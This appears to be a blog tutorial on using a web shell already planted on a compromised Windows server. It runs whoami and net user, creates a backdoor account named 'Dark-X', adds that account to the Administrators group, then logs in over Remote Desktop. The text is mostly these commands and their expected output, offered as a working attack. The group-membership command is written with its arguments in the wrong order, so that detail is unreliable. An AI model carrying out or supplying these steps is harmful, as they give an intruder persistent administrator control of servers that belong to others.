Well this is diffirent from *Unix process there we use exploit here we use only commands
and yes if we are not able to execute those commands we can try some alternativ but still the possibilitys to work are really low....Am gonna explane why a bit later.....
What we need:
-Shell atteched on Some Site
-Server must be runing on Windows OS
We access our shell and go to the command console and we frist gonna check who we are:
whoami
This command is to check with what user we are running and its can show us like:
Administrator or SystAdmin
Thats good we are running like administrator cool letz see how many users have on the server:
Code:
net user
And we gonna see something like :
C:\Users\Administrator>net user
\\SERVER **********
----------------------------------------------------------
Administrator Guest Remote
__________________________________
Command Successfully executed.
So this means that there are like 3 users on the this server :
Administrator,Guest,Remote
So we can try to add a new user ex: Dark-X
Code:
net user Dark-X /add
This command is for adding user with password:
Code:
net user Username Password /add
when we execute this command we will get some windows saying:
Code:
___________________________
Command Successfully executed.
now letz check:
net user Dark-X
Will display something like this:
Username: Dark-X
Name: Dark-X
Last Time Online: XX:XX:XX-XX/XX
Local Group: *User
So we are in group user we need to be in Administrator or Remote to connect on Remote Desktop Connection so we type:
Code:
Net localgroup Dark-X Administrator /add
and we will see agaen this line:
Command Successfully executed.
If we see this that means that we have added our user to Administrators group now we can try to connect on RDP and access the whole server.
Windows RDP Starting:
Start Menu=>All Programs=>Accessories=>Remote Desktop Connection
Linux:
Open Terminal write: rdesktop -u Username -p Password IP
or
rdesktop IP
No comments:
Post a Comment